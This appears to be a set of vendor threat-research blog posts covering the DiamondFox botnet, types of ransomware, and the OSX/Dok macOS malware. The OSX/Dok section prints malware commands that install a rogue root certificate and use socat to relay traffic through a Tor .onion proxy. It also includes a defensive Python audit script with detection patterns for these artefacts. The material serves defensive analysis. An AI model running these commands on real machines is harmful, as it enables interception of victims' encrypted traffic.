DiamondFox, a modular botnet offered for sale on various underground forums, is an outstanding demonstration of the many advantages of this business model. By purchasing a single product, the buyer is granted access to a variety of capabilities, in the form of plugins, and can plan and execute multiple campaigns: a tailored espionage campaign, a credentials theft campaign, which can be the basis of an extensive monetary theft operation, and even a simple, yet highly effective distributed denial of service (DDoS) attack.

Together with Terbium Labs, a Dark Web Data Intelligence company, we reviewed the DiamondFox malware’s capabilities, sales procedure and user experience. This report also includes a full technical analysis of the malware’s functionality, network communications and multiple plugins.

 Malware ecosystem

Looking at the full list of capabilities of the latest version of DiamondFox, the Crystal version, this highly modular malware seems to cover everything from keylogging and browser password stealing, through cryptocurrency wallet stealing, all the way to a variety of Distributed Denial of Service (DDoS) attack techniques. DiamondFox, one of the trendiest malware-as-a-service offerings up for sale these days, is in fact a one-stop shop: upon purchasing the malware for a certain period, a selection of plugins becomes accessible. All that’s left for the buyer to do is to choose which one to activate for each victim and when.

DiamondFox advertisement, dated April 2016

The ad displayed above, which presents the latest version of DiamondFox, includes a detailed explanation about the malware loader, the user panel and the actual core of DiamondFox – the plugins.

It also includes a carefully updated Changelog, which provides the potential buyers a detailed explanation about the improvements and features added to each of the versions.

At this point, after examining the highly successful Cerber Ransomware-as-a-service and the user-friendly Sundown Exploit Kit, there is no need to elaborate about the management panel granted to each user who purchases the malware. It goes without saying that the DiamondFox user panel is comprehensive and secured, and provides users real-time infection statistics as well as control over the activation of the plugins. Moreover, most of the DiamondFox advertisements guarantee free updates and support.

DiamondFox user panel screenshots

DiamondFox user panel screenshots, single victim view

So far, the DiamondFox botnet seems like the perfect solution for any actor seeking an easy way to initiate their own campaigns. DiamondFox offers a range of plugins, which provide the user several data theft possibilities, and the ability to self-spread via removable devices and social networks. DiamondFox can definitely be used as the basis of a monetary theft operation, or a tailored espionage campaign. Furthermore, it appears that the official malware vendor, an actor dubbed ‘Edbitss’, is truly invested in the improvement of the malware, as all updates, changes and fixes are carefully documented and shared with the potential buyers. Edbitss is clearly very responsive in all of the observed threads. Several customer reviews validate this impression and describe a quality, fully functioning product:

DiamondFox customer review

However, other reviews tell an entirely different story:

DiamondFox customer review

We can’t help but wonder which side is telling the truth.

As mentioned previously, Edbitss is the official DiamondFox vendor, based on evidence from the ads referred to in this report. The actor uses the same Jabber address in all of the observed ads, both on the clear web and on the Darknet. However, different contact details were observed throughout the various ads, each using a top-level domain linking the actor to another country. The actor claims to be located in Russia and appears to be fluent in Russian. However, during the investigation we came across a clear web landing page established by the actor in March 2016, on the domain ‘’, the Mexican website of the highly popular blog-publishing service. From this, there is a high possibility that the actor lives in Mexico.

Check Point customers are protected from DiamondFox by the following security technologies:

  • The Antivirus Software Blade blocks every currently known variant of DiamondFox.
  • The Anti-Bot Software Blade detects and blocks any attempt to communicate with DiamondFox’s C&C addresses.
  • Indicators of Compromise are provided in the DiamondFox report and the detailed Appendices.


Ransomware – Not Only File Encryption

Category : Check Point

Ransomware is an ever-increasing threat worldwide, claiming new victims on a regular basis with no end in sight. While most ransomware families prevent the victims from accessing their documents, pictures, databases and other files by encrypting them and offering a decryption key in return for a ransom payment, others use different, but no less creative ways to extract payment from their victims. Here are some examples:

IoT ransomware

Smart devices are known to be a soft spot targeted by threat actors for various purposes. In August 2016, security researchers demonstrated their ability to take control of a building’s thermostats and cause them to increase the temperature up to 99 degrees Celsius. This was the first proof of concept of this kind of attack, showing a creative way to put pressure on victims and drive them to pay ransom or risk consequences such as a flood or an incinerated house.

In November 2016, travelers on the San Francisco MUNI Metro were prevented from buying tickets at the stations due to a ransomware attack on MUNI’s network. In this case the attackers demanded $70,000 in BitCoins. In January 2017, a luxury hotel in Austria was said to have suffered an attack on its electronic key system, resulting in guests experiencing difficulties getting in or out of their rooms. The attackers demanded $1,500 in BitCoins. Whether or not this story is accurate, it demonstrates how creative this type of attack can get.

The growing use of IoT devices will likely make this attack vector more and more common in the future. For example, the potential exploitation of vulnerabilities inside smart, implantable cardiovascular defibrillators can allow an attacker to put a victim’s life at risk until the ransom is paid. As IoT devices become more widespread in our everyday life, threat actors will find new, horrifying ways to subjugate victims for profit.


Hostage data ransomware

A more direct approach is to steal data from victims and threaten to expose it unless a ransom payment is received by a certain deadline. This generic modus operandi has been used by different malware families and campaigns. For example, in May 2016, over 10 million customer records of a leading South Korean online shopping mall were stolen, including names, addresses and phone numbers. The attackers demanded a ransom of $2,664 in BitCoins to prevent release of the information online.

Another example is Charger, a screen-locker Android ransomware discovered by Check Point researchers in January 2016. The attackers threatened to sell stolen data from targeted devices unless they receive a ransom of 0.2 BitCoins (approximately $180). The malware is embedded in a mobile app named EnergyRescue, downloaded from Google Play.


DDoS ransomware

Another method for attackers is threatening to conduct a denial of service attack unless a ransom is paid. With the growing use of botnets for DDoS attacks, this attack vector is especially common against banks, and is very attractive as it is far simpler than developing a ‘traditional’ file-encrypting ransomware. This attack vector made headlines in January 2017 when it was used in an attack against the web portal of the British Lloyds Bank. The attackers issued a DDoS threat with a demand of 100 BitCoins (worth approximately $94,000).


Screen lockers

Some ransomware simply prevents victims from using their devices by locking their screens. There are different ways to conduct a screen-locking attack, but common features include disabling every option to close the locking program or to shut the device down.

Examples of such ransomware are DeriaLock (December 2016), which targets PCs and demands a payment of $30 for unlocking; and Flocker (May 2015), an Android screen locker which targets smartphones and Android-run smart TVs, and demands an iTunes gift card worth $200 as payment.




Ransomware attacks are a popular way for threat actors to make easy profits, as the payment is made anonymously using anonymous BitCoin wallets rather than bank transfers. The motivation for victims to cooperate is high, as their personal data is on the line. While most ransomware families encrypt files, some use creative ways to drive victims to pay. By preventing victims from accessing their machines, creating real damage or exposing sensitive data, the attackers are able to bypass the complexities of managing an encryption and decryption process.

We estimate that the use of alternative ransomware, especially DDoS and IoT ransomware, will keep on growing in the near future, as IoT devices and web services continue to become more widespread.


How to protect yourself

We highly recommend you take these steps to protect yourself from ransomware or mitigate their effects:

  • Back up your most important files – Make an offline copy of your files on an external device and an online cloud storage service. This method protects your files not only from ransomware but from other hazards as well. Note: external devices should be used for backup ONLY and be disconnected immediately after the backup is completed.
  • Exercise caution – We usually don’t sense any danger while using our computers or other devices, but it’s there. Threat actors are constantly trying to steal your money, your private data and your machine resources – don’t let them have it. Don’t open e-mails you don’t expect to receive, don’t click links unless you know exactly what they are and where they lead, and if you are asked to run macros on an Office file, DON’T! The only situation in which you should run macros is in the rare case that you know exactly what those macros will do. Additionally, keep track of the latest major malware campaigns to ensure that you will not fall victim to a new and unique phishing technique or download a malicious app, which can lead to malware installation on your computer or theft of your credentials.
  • Have a comprehensive, up-to-date security solution – High quality security solutions and products protect you from a variety of malware types and attack vectors. Today’s Anti-Virus, IPS and sandboxing solutions can detect and block Office documents that contain malicious macros, and prevent many exploit kits from exploiting your system even prior to the malware infection. Check Point’s SandBlast solution efficiently detects and blocks ransomware samples, and extracts malicious content from files delivered by spam and phishing campaigns. Installing your IoT devices behind a Security Gateway will keep them safe as well.



OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic

Category : Check Point

People often assume that if you’re running OSX, you’re relatively safe from malware. But this is becoming less and less true, as evidenced by a new strain of malware encountered by the Check Point malware research team. This new malware – dubbed OSX/Dok – affects all versions of OSX, has 0 detections on VirusTotal (as of the writing of these words), is signed with a valid developer certificate (authenticated by Apple), and is the first major-scale malware to target OSX users via a coordinated email phishing campaign.

Once OSX/Dok infection is complete, the attackers gain complete access to all victim communication, including communication encrypted by SSL. This is done by redirecting victim traffic through a malicious proxy server.

The malware mostly targets European users. For instance, one phishing message was observed to target a user in Germany by baiting the user with a message regarding supposed inconsistencies in their tax returns (see image, and translation, below).

Technical details:

The malware bundle is contained in a .zip archive named It was signed on April 21st 2017 by a “Seven Muller” and the bundle name is Truesteer.AppStore.

Upon execution, the malware will copy itself to the /Users/Shared/ folder, and will then proceed to execute itself from the new location by running the shell commands below:

Then, the malware will pop-up a fabricated message claiming that “the package is damaged” and therefore cannot execute:


If a loginItem named “AppStore” exists, the malware will delete it, and instead add itself as a loginItem, which persists in the system and executes automatically every time the system reboots, until it finishes installing its payload.


The malicious application will then create a window on top of all other windows. This new window contains a message claiming that a security issue has been identified in the operating system, that an update is available, and that to proceed with the update the user has to enter a password, as shown in the picture below. The malware checks the system localization, and supports messages in both German and English.


The victim is barred from accessing any windows or using their machine in any way until they relent, enter the password and allow the malware to finish installing. Once they do, the malware gains administrator privileges on the victim’s machine.

Using those privileges, the malware will then install brew, a package manager for OS X, which will be used to install two additional tools: TOR, which allows connection to the dark web, and SOCAT, a low-level command-line utility for relaying connections between sockets.

The malware will then give the current user admin privileges immediately on demand without prompting for a password. This is done so that the malware won’t provoke constant admin password prompts when abusing its admin privileges with the sudo command. This is done by adding the following line to /etc/sudoers:


The malware then changes the victim system’s network settings such that all outgoing connections will pass through a proxy, which is dynamically obtained from a Proxy AutoConfiguration (PAC) file hosted on a malicious server. The script that makes these configuration changes can be seen below:

The resulting change can be seen in the Network Settings:



The malware will then proceed to install a new root certificate in the victim system, which allows the attacker to intercept the victim’s traffic using a Man in The Middle (MiTM) attack. By abusing the victim’s new-found trust in this bogus certificate, the attacker can impersonate any website, and the victim will be none the wiser. The new certificate is installed using the following command:

security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/cert.der


The newly-installed certificate can be seen in the two images below.



The malware will also install two LaunchAgents that start at system boot and have the following names:




These LaunchAgents will redirect requests to through the dark web address “paoyu7gub72lykuk.onion”. This is necessary for the previous PAC configuration to work (note that the original configuration looks for the PAC file on the local host

These LaunchAgents consist of the following bash commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050


As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please.
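The host-side artefacts described above (the passwordless sudoers grant, the PAC URL pointing at a local relay or a Tor hidden service, the socat LaunchAgents, and the extra root certificate in the System keychain) are the things a defender can audit for. The following Python script is an added example written for this page, not Check Point’s tooling or the malware author’s code. The sample sudoers text, proxy output, LaunchAgent plist and PEM blob are constructed; the exact shape of the sudoers rule and the `com.example.relay` label are assumptions; the live-collection commands (`sudo cat /etc/sudoers`, `networksetup -getautoproxyurl`, `security find-certificate -a -p`) are standard macOS tools.

```python
"""Audit helpers for the OSX/Dok indicators described above: a NOPASSWD
sudoers grant, a PAC URL served from loopback or a .onion host, socat
LaunchAgents, and root certificates missing from a clean baseline.
Added example (not Check Point's code). Analysis functions take text or
bytes so they run offline; collect_and_report() gathers live inputs on macOS."""
import base64
import glob
import hashlib
import os
import plistlib
import re
import subprocess
import sys

# Assumed shape of the added sudoers line: "<user> ALL=(ALL) NOPASSWD: ALL"
_NOPASSWD_RULE = re.compile(
    r"^\s*(?!#)(\S+)\s+ALL\s*=\s*\([^)]*\)\s*NOPASSWD:\s*ALL\s*$", re.M)
# Relay artefacts named on the page: socat, SOCKS4A via Tor's port 9050,
# local listeners on 5555/5588 and a .onion hidden service.
_RELAY_MARKERS = ("socat", "SOCKS4A", "socksport=9050", ".onion",
                  "LISTEN:5555", "LISTEN:5588")
_PEM_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)

# Constructed samples, not captured from a real infection.
SAMPLE_SUDOERS = ("# constructed sudoers\nroot ALL=(ALL) ALL\n"
                  "%admin ALL=(ALL) ALL\nvictim ALL=(ALL) NOPASSWD: ALL\n")
SAMPLE_AUTOPROXY = "URL: http://127.0.0.1:5555/proxy.pac\nEnabled: Yes\n"
SAMPLE_LAUNCH_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.relay</string>
  <key>RunAtLoad</key><true/>
  <key>ProgramArguments</key><array>
    <string>/usr/local/bin/socat</string>
    <string>tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1</string>
    <string>SOCKS4A:127.0.0.1:placeholder.onion:80,socksport=9050</string>
  </array>
</dict></plist>"""
SAMPLE_PEM = ("-----BEGIN CERTIFICATE-----\n"
              + base64.b64encode(b"constructed bytes, not a real cert").decode()
              + "\n-----END CERTIFICATE-----\n")

def nopasswd_users(sudoers_text):
    """Users or %groups granted NOPASSWD for ALL commands."""
    return _NOPASSWD_RULE.findall(sudoers_text)

def suspicious_proxy(autoproxy_output):
    """Parse `networksetup -getautoproxyurl <service>` output (lines
    "URL: ..." and "Enabled: Yes/No"); return the finding or None."""
    url, enabled = None, False
    for line in autoproxy_output.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "URL":
            url = value.strip()
        elif key.strip() == "Enabled":
            enabled = value.strip().lower() == "yes"
    if not (url and enabled):
        return None
    host = re.sub(r"^[a-z]+://", "", url).split("/", 1)[0].split(":", 1)[0]
    if host in ("127.0.0.1", "localhost") or host.endswith(".onion"):
        return {"url": url, "host": host}
    return None

def launch_agent_findings(plist_bytes):
    """Relay markers present in a LaunchAgent's ProgramArguments."""
    agent = plistlib.loads(plist_bytes)
    argv = " ".join(agent.get("ProgramArguments", []))
    return {"label": agent.get("Label"),
            "run_at_load": bool(agent.get("RunAtLoad")),
            "hits": [m for m in _RELAY_MARKERS if m in argv]}

def unexpected_roots(pem_dump, expected_sha256):
    """SHA-256 fingerprints (of the DER bytes; no X.509 parsing) in a
    `security find-certificate -a -p` dump that are not in the baseline."""
    found = []
    for body in _PEM_BLOCK.findall(pem_dump):
        fingerprint = hashlib.sha256(
            base64.b64decode("".join(body.split()))).hexdigest()
        if fingerprint not in expected_sha256:
            found.append(fingerprint)
    return found

def collect_and_report(service="Wi-Fi", baseline=frozenset()):
    """Run all checks against the live host (macOS only; needs sudo)."""
    if sys.platform != "darwin":
        raise SystemExit("live collection only runs on macOS")

    def run(*cmd):
        return subprocess.run(cmd, capture_output=True, text=True).stdout

    print("NOPASSWD grants:", nopasswd_users(run("sudo", "cat", "/etc/sudoers")))
    print("PAC finding:", suspicious_proxy(run("networksetup", "-getautoproxyurl", service)))
    for path in glob.glob(os.path.expanduser("~/Library/LaunchAgents/*.plist")):
        with open(path, "rb") as fh:
            print(path, launch_agent_findings(fh.read()))
    pem = run("security", "find-certificate", "-a", "-p", "/Library/Keychains/System.keychain")
    print("roots not in baseline:", unexpected_roots(pem, baseline))
```

On a Mac, call `collect_and_report(baseline=...)` with the set of root fingerprints recorded from a known-clean machine; any fingerprint outside that set is worth inspecting, since a trust root added by `security add-trusted-cert` is exactly what lets the attacker’s proxy present forged certificates. The same functions can be pointed at a sudoers file, plists or a keychain dump pulled from a disk image, which is how they are exercised against the constructed samples.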

When done, the malware will delete itself.

All that is left to say: beware of Trojans bearing gifts, especially if they ask for your root password.




Sample hash – 7819ae7d72fa045baa77e9c8e063a69df439146b27f9c3bb10aef52dcc77c145







Check Point Protections